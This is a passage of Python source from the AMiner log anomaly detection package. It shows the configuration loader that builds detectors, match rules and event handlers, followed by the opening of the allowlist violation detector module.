set_upper_limit=item['set_upper_limit'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], season=item['season'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventCountClusterDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], persistence_id=item['persistence_id'], id_path_list=item['id_path_list'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], idf=item['idf'], norm=item['norm'], add_normal=item['add_normal'], check_empty_windows=item['check_empty_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'TimeCorrelationDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['parallel_check_count'], persistence_id=item['persistence_id'], record_count_before_event=item['record_count_before_event'], output_logline=item['output_logline'], use_path_match=item['use_path_match'], use_value_match=item['use_value_match'], min_rule_attributes=item['min_rule_attributes'], max_rule_attributes=item['max_rule_attributes'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'ParserCount': tmp_analyser = func( analysis_context.aminer_config, item['paths'], anomaly_event_handlers, report_interval=item['report_interval'], target_label_list=item['labels'], split_reports_flag=item['split_reports_flag'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EventCorrelationDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], max_hypotheses=item['max_hypotheses'], hypothesis_max_delta_time=item['hypothesis_max_delta_time'], generation_probability=item['generation_probability'], generation_factor=item['generation_factor'], max_observations=item['max_observations'], p0=item['p0'], alpha=item['alpha'], candidates_size=item['candidates_size'], hypotheses_eval_delta_time=item['hypotheses_eval_delta_time'], constraint_list=item['constraint_list'], delta_time_to_discard_hypothesis=item['delta_time_to_discard_hypothesis'], check_rules_flag=item['check_rules_flag'], learn_mode=learn, ignore_list=item['ignore_list'], persistence_id=item['persistence_id'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'NewMatchIdValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, id_path_list=item['id_path_list'], min_allowed_time_diff=item['min_allowed_time_diff'], learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'SlidingEventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], set_upper_limit=item['set_upper_limit'], local_maximum_threshold=item['local_maximum_threshold'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'LinearNumericBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'ModuloTimeBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['modulo_value'], item['time_unit'], item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'HistogramAnalysis': histogram_definitions = [] for histogram_definition in item['histogram_defs']: if len(histogram_definition) != 2: msg = 'Every item of the histogram_definitions must have an size of 2!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if histogram_definition[1] not in analysis_dict: msg = f'{histogram_definition[1]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) histogram_definitions.append((histogram_definition[0], analysis_dict[histogram_definition[1]])) tmp_analyser = func(analysis_context.aminer_config, histogram_definitions, item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'PathDependentHistogramAnalysis': if item['bin_definition'] not in analysis_dict: msg = f'{item["bin_definition"]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, item['path'], analysis_dict[item['bin_definition']], item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EnhancedNewMatchPathValueComboDetector': tuple_transformation_function = None if item['tuple_transformation_function'] == 'demo': tuple_transformation_function = tuple_transformation_function_demo_print_every_10th_value tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], learn_mode=learn, tuple_transformation_function=tuple_transformation_function, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) global enhanced_new_match_path_value_combo_detector_reference enhanced_new_match_path_value_combo_detector_reference = tmp_analyser elif item['type'].name == 'MatchFilter': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, target_value_list=item['value_list'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueAverageChangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['timestamp_path'], item['paths'], item['min_bin_elements'], item['min_bin_time'], debug_mode=item['debug_mode'], persistence_id=item['persistence_id'], output_logline=item['output_logline'], avg_factor=item['avg_factor'], var_factor=item['var_factor'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MatchValueStreamWriter': stream = sys.stdout if item['stream'] == 'sys.stderr': stream = sys.stderr tmp_analyser = func(stream, item['paths'], item['separator'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace( b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), item['missing_value_string'].encode().replace( b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'NewMatchPathDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif 'MatchAction' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if item['type'].name == 'EventGenerationMatchAction': tmp_analyser = func(item['event_type'], item['event_message'], anomaly_event_handlers) elif item['type'].name == 'AtomFilterMatchAction': if 'subhandler_list' in item: tmp_analyser = func([analysis_context.get_component_by_name(component) for component in item['subhandler_list']], stop_when_handled_flag=item['stop_when_handled_flag']) if item['delete_components']: for component_name in item['subhandler_list']: component = analysis_context.get_component_by_name(component_name) for i, val in enumerate(atom_filter.subhandler_list): if val[0] == component: del atom_filter.subhandler_list[i] break else: tmp_analyser = func([handler for handler, stop_when_handled_flag in atom_filter.subhandler_list], stop_when_handled_flag=item['stop_when_handled_flag']) match_action_dict[comp_name] = tmp_analyser continue elif 'MatchRule' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = None if item['match_action'] is not None: if item['match_action'] not in match_action_dict: msg = f'The match action {item["match_action"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = match_action_dict[item['match_action']] if item['type'].name in ('AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'): sub_rules = [] for sub_rule in item['sub_rules']: if sub_rule not in match_rules_dict: msg = f'The sub match rule {sub_rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rules.append(match_rules_dict[sub_rule]) tmp_analyser = func(sub_rules, match_action=match_action) if item['type'].name == 'ValueDependentDelegatedMatchRule': rule_lookup_dict = {} for key, rule in item['rule_lookup_dict'].items(): if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) rule_lookup_dict[ast.literal_eval(key)] = match_rules_dict[rule] tmp_analyser = func( item['paths'], rule_lookup_dict, default_rule=match_rules_dict[item['default_rule']], match_action=match_action) if item['type'].name == 'NegationMatchRule': if item['sub_rule'] not in match_rules_dict: msg = f'The match rule {item["sub_rule"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rule = match_rules_dict[item['sub_rule']] tmp_analyser = func(sub_rule, match_action=match_action) if item['type'].name in ('PathExistsMatchRule', 'IPv4InRFC1918MatchRule'): tmp_analyser = func(item['path'], match_action=match_action) if item['type'].name == 'ValueMatchRule': if isinstance(item['value'], str): item['value'] = item['value'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") tmp_analyser = func(item['path'], item['value'], match_action=match_action) if item['type'].name == 'ValueListMatchRule': value_list = [] for val in item['value_list']: if isinstance(val, str): val = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") value_list.append(val) tmp_analyser = func(item['path'], value_list, match_action=match_action) if item['type'].name == 'ValueRangeMatchRule': tmp_analyser = func(item['path'], item['lower_limit'], item['upper_limit'], match_action) if item['type'].name == 'StringRegexMatchRule': import re tmp_analyser = func(item['path'], re.compile(item['regex'].encode()), match_action=match_action) if item['type'].name == 'ModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. tmp_analyser = func(item['path'], item['seconds_modulo'], item['lower_limit'], item['upper_limit'], match_action=match_action) if item['type'].name == 'ValueDependentModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. limit_lookup_dict = {} for key in item['limit_lookup_dict'].keys(): if isinstance(key, str): limit_lookup_dict[key.encode()] = item['limit_lookup_dict'][key] else: limit_lookup_dict[key] = item['limit_lookup_dict'][key] tmp_analyser = func(item['path'], item['seconds_modulo'], item['paths'], limit_lookup_dict, default_limit=item['default_limit'], match_action=match_action) if item['type'].name == 'DebugMatchRule': tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) if item['type'].name == 'DebugHistoryMatchRule': # object_history is not supported yet.. tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) match_rules_dict[comp_name] = tmp_analyser continue elif item['type'].name == 'CorrelationRule': artefact_match_parameters = [] for match_parameters in item['artefact_match_parameters']: artefact_match_parameters.append(tuple(i for i in match_parameters)) tmp_analyser = func(item['rule_id'], item['min_time_delta'], item['max_time_delta'], artefact_match_parameters=artefact_match_parameters, max_violations=item['max_violations']) correlation_rules[item['rule_id']] = tmp_analyser continue elif item['type'].name == 'EventClassSelector': if item['artefact_a_rules'] is None and item['artefact_b_rules'] is None: msg = 'At least one of the EventClassSelector\'s rules must not be None!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules = None artefact_b_rules = None if item['artefact_a_rules'] is not None: artefact_a_rules = [] for rule in item['artefact_a_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules.append(correlation_rules[rule]) if item['artefact_b_rules'] is not None: artefact_b_rules = [] for rule in item['artefact_b_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_b_rules.append(correlation_rules[rule]) tmp_analyser = func(item['action_id'], artefact_a_rules, artefact_b_rules) match_action_dict[item['action_id']] = tmp_analyser continue elif item['type'].name == 'TimeCorrelationViolationDetector': ruleset = [] for rule in item['ruleset']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) ruleset.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, ruleset, anomaly_event_handlers, log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'TimestampsUnsortedDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, exit_on_error_flag=item['exit_on_error_flag'], output_logline=item['output_logline']) elif item['type'].name == 'AllowlistViolationDetector': allowlist_rules = [] for rule in item['allowlist_rules']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) allowlist_rules.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EventTypeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], id_path_list=item['id_path_list'], allow_missing_id=item['allow_missing_id'], allowed_id_tuples=item['allowed_id_tuples'], min_num_vals=item['min_num_vals'], max_num_vals=item['max_num_vals'], save_values=item['save_values'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'VariableTypeDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], gof_alpha=item['gof_alpha'], s_gof_alpha=item['s_gof_alpha'], s_gof_bt_alpha=item['s_gof_bt_alpha'], d_alpha=item['d_alpha'], d_bt_alpha=item['d_bt_alpha'], div_thres=item['div_thres'], sim_thres=item['sim_thres'], indicator_thres=item['indicator_thres'], num_init=item['num_init'], num_update=item['num_update'], num_update_unq=item['num_update_unq'], num_s_gof_values=item['num_s_gof_values'], num_s_gof_bt=item['num_s_gof_bt'], num_d_bt=item['num_d_bt'], num_pause_discrete=item['num_pause_discrete'], num_pause_others=item['num_pause_others'], test_gof_int=item['test_gof_int'], num_stop_update=item['num_stop_update'], silence_output_without_confidence=item['silence_output_without_confidence'], silence_output_except_indicator=item['silence_output_except_indicator'], num_var_type_hist_ref=item['num_var_type_hist_ref'], num_update_var_type_hist_ref=item['num_update_var_type_hist_ref'], num_var_type_considered_ind=item['num_var_type_considered_ind'], num_stat_stop_update=item['num_stat_stop_update'], num_updates_until_var_reduction=item['num_updates_until_var_reduction'], var_reduction_thres=item['var_reduction_thres'], num_skipped_ind_for_weights=item['num_skipped_ind_for_weights'], num_ind_for_weights=item['num_ind_for_weights'], used_multinomial_test=item['used_multinomial_test'], use_empiric_distr=item['use_empiric_distr'], used_range_test=item['used_range_test'], range_alpha=item['range_alpha'], range_threshold=item['range_threshold'], range_limits_factor=item['range_limits_factor'], num_reinit_range=item['num_reinit_range'], dw_alpha=item['dw_alpha'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'VariableCorrelationDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], num_init=item['num_init'], num_update=item['num_update'], disc_div_thres=item['disc_div_thres'], num_steps_create_new_rules=item['num_steps_create_new_rules'], num_upd_until_validation=item['num_upd_until_validation'], num_end_learning_phase=item['num_end_learning_phase'], check_cor_thres=item['check_cor_thres'], check_cor_prob_thres=item['check_cor_prob_thres'], check_cor_num_thres=item['check_cor_num_thres'], min_values_cors_thres=item['min_values_cors_thres'], new_vals_alarm_thres=item['new_vals_alarm_thres'], num_bt=item['num_bt'], alpha_bt=item['alpha_bt'], used_homogeneity_test=item['used_homogeneity_test'], alpha_chisquare_test=item['alpha_chisquare_test'], max_dist_rule_distr=item['max_dist_rule_distr'], used_presel_meth=item['used_presel_meth'], intersect_presel_meth=item['intersect_presel_meth'], percentage_random_cors=item['percentage_random_cors'], match_disc_vals_sim_tresh=item['match_disc_vals_sim_tresh'], exclude_due_distr_lower_limit=item['exclude_due_distr_lower_limit'], match_disc_distr_threshold=item['match_disc_distr_threshold'], used_cor_meth=item['used_cor_meth'], used_validate_cor_meth=item['used_validate_cor_meth'], validate_cor_cover_vals_thres=item['validate_cor_cover_vals_thres'], validate_cor_distinct_thres=item['validate_cor_distinct_thres'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'PathValueTimeIntervalDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], ignore_list=item['ignore_list'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], time_period_length=item['time_period_length'], max_time_diff=item['max_time_diff'], num_reduce_time_list=item['num_reduce_time_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'PathArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], output_logline=item['output_logline'], learn_mode=learn, num_init=item['num_init'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], alpha=item['alpha'], alpha_bt=item['alpha_bt'], num_results_bt=item['num_results_bt'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_periods_tsa_ini=item['num_periods_tsa_ini'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'TSAArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], waiting_time=item['waiting_time'], num_sections_waiting_time=item['num_sections_waiting_time'], target_path_list=item['paths'], acf_pause_interval_percentage=item['acf_pause_interval_percentage'], acf_auto_pause_interval=item['acf_auto_pause_interval'], acf_auto_pause_interval_num_min=item['acf_auto_pause_interval_num_min'], build_sum_over_values=item['build_sum_over_values'], num_periods_tsa_ini=item['num_periods_tsa_ini'], num_division_time_step=item['num_division_time_step'], alpha=item['alpha'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_results_bt=item['num_results_bt'], alpha_bt=item['alpha_bt'], acf_threshold=item['acf_threshold'], round_time_interval_threshold=item['round_time_interval_threshold'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], min_log_lines_per_time_step=item['min_log_lines_per_time_step'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MinimalTransitionTimeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], target_path_list=item['paths'], id_path_list=item['id_path_list'], ignore_list=item['ignore_list'], allow_missing_id=item['allow_missing_id'], num_log_lines_solidify_matrix=item['num_log_lines_solidify_matrix'], time_output_threshold=item['time_output_threshold'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time'], anomaly_threshold=item['anomaly_threshold']) elif item["type"].name in ("VerboseUnparsedAtomHandler", "SimpleUnparsedAtomHandler"): has_unparsed_handler = True stop_when_handled_flag = True if item["type"].name == "VerboseUnparsedAtomHandler": tmp_analyser = func(anomaly_event_handlers, parsing_model) else: tmp_analyser = func(anomaly_event_handlers) analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.subhandler_list[0] = (tmp_analyser, stop_when_handled_flag) continue else: tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn) if item['output_event_handlers'] is not None: tmp_analyser.output_event_handlers = item['output_event_handlers'] analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.add_handler(tmp_analyser, stop_when_handled_flag=stop_when_handled_flag) add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) def add_default_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model): """Add the default unparsed atom handler and/or NewMatchPathDetector if none is configured.""" if not has_unparsed_handler: from aminer.analysis.UnparsedAtomHandlers import VerboseUnparsedAtomHandler atom_filter.add_handler(VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model), stop_when_handled_flag=True) has_unparsed_handler = True if not has_new_match_path_handler: has_new_match_path_handler = True if 'LearnMode' in yaml_data: learn = yaml_data['LearnMode'] else: learn = True from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector nmpd = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn) nmpd.output_event_handlers = None analysis_context.register_component(nmpd, component_name='DefaultNewMatchPathDetector') atom_filter.add_handler(nmpd) return has_new_match_path_handler, has_unparsed_handler def build_event_handlers(analysis_context, anomaly_event_handlers): """Build the event handlers.""" import os import stat try: event_handler_id_list = [] if 'EventHandlers' in yaml_data and yaml_data['EventHandlers'] is not None: for item in yaml_data['EventHandlers']: if item['id'] in event_handler_id_list: raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in EventHandlers!') event_handler_id_list.append(item['id']) func = item['type'].func ctx = None if item['type'].name == 'StreamPrinterEventHandler': if 'output_file_path' in item: try: mode = 'w+' if os.path.exists(item['output_file_path']) and stat.S_ISFIFO(os.stat(item['output_file_path']).st_mode): mode = 'w' stream = open(item['output_file_path'], mode) ctx = func(analysis_context, stream) except OSError as e: msg = f'Error occured when opening stream to output_file_path {item["output_file_path"]}. Error: {e}' logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) else: ctx = func(analysis_context) if item['type'].name == 'DefaultMailNotificationEventHandler': ctx = func(analysis_context) if item['type'].name == 'SyslogWriterEventHandler': ctx = func(analysis_context, item['instance_name']) if item['type'].name == 'KafkaEventHandler': import configparser config = configparser.ConfigParser() if os.access(item['cfgfile'], os.R_OK): config.read(item['cfgfile']) else: msg = f'{item["cfgfile"]} does not exist or is not readable' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) options = dict(config.items("DEFAULT")) for key, val in options.items(): try: if key == "sasl_plain_username": continue options[key] = int(val) except ValueError: pass ctx = func(analysis_context, item['topic'], options) if item['type'].name == 'ZmqEventHandler': # if topic is "None" zmq will send messages without using any topic if 'topic' not in item: item['topic'] = None ctx = func(analysis_context, item['topic'], item['url']) if ctx is None: ctx = func(analysis_context) if item['json'] is True or item['type'].name == 'KafkaEventHandler' or item['type'].name == 'ZmqEventHandler': from aminer.events.JsonConverterHandler import JsonConverterHandler if item['pretty'] is True: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=True) else: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=False) if item['score']: from aminer.events.ScoringEventHandler import ScoringEventHandler ctx = ScoringEventHandler([ctx], analysis_context, weights=item['weights'], auto_weights=item['auto_weights'], auto_weights_history_length=item['auto_weights_history_length']) anomaly_event_handlers.append(ctx) return event_handler_id_list raise KeyError() except KeyError: # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context, stream=sys.stderr)) return None def tuple_transformation_function_demo_print_every_10th_value(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector_reference.known_values_dict.get(tuple(match_value_list), None) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector_reference.learn_mode = False else: enhanced_new_match_path_value_combo_detector_reference.learn_mode = True return match_value_list def parse_json_yaml(json_dict, parser_model_dict): """Parse a yaml configuration for json.""" key_parser_dict = {} for key in json_dict.keys(): value = json_dict[key] if key is None: key = 'null' if key is False: key = 'false' if key is True: key = 'true' if isinstance(value, dict): key_parser_dict[key] = parse_json_yaml(value, parser_model_dict) elif isinstance(value, list): key_parser_dict[key] = [] for val in value: if isinstance(val, dict): key_parser_dict[key].append(parse_json_yaml(val, parser_model_dict)) elif val in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): if len(value) > 1 and val == "ALLOW_ALL": msg = "ALLOW_ALL must not be combined with other parsers in lists." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) key_parser_dict[key] = value elif parser_model_dict.get(val) is None: msg = f'The parser model {val} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key].append(parser_model_dict.get(val)) elif value in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): key_parser_dict[key] = value elif parser_model_dict.get(value) is None: msg = f'The parser model {value} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key] = parser_model_dict.get(value) return key_parser_dict logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py000066400000000000000000000000001500476301700313020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/000077500000000000000000000000001500476301700310265ustar00rootroot00000000000000AllowlistViolationDetector.py000066400000000000000000000102311500476301700366470ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for log atoms not matching any allowlisted rule. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, DEBUG_LOG_NAME from aminer import AminerConfig from aminer.analysis.Rules import MatchRule class AllowlistViolationDetector(AtomHandlerInterface): """Objects of this class handle a list of allowlist rules. They ensure, that each received log-atom is at least covered by a single allowlist rule. To avoid traversing the complete rule tree more than once, the allowlist rules may have match actions attached that set off an alarm by themselves. """ def __init__(self, aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True, log_resource_ignore_list=None): """Initialize the detector. @param allowlist_rules list of rules executed until the first rule matches. """ super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, output_logline=output_logline, allowlist_rules=allowlist_rules, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]) if allowlist_rules is None: msg = "allowlist_rules must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for path in self.allowlist_rules: if not isinstance(path, MatchRule): msg = "allowlist_rules values must be of the type MatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def receive_atom(self, log_atom): """Receive a parsed atom and the information about the parser match. @param log_atom atom with parsed data to check @return a boolean value if the log atom matches one of the rules. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 event_data = {} for rule in self.allowlist_rules: if rule.match(log_atom): self.log_success += 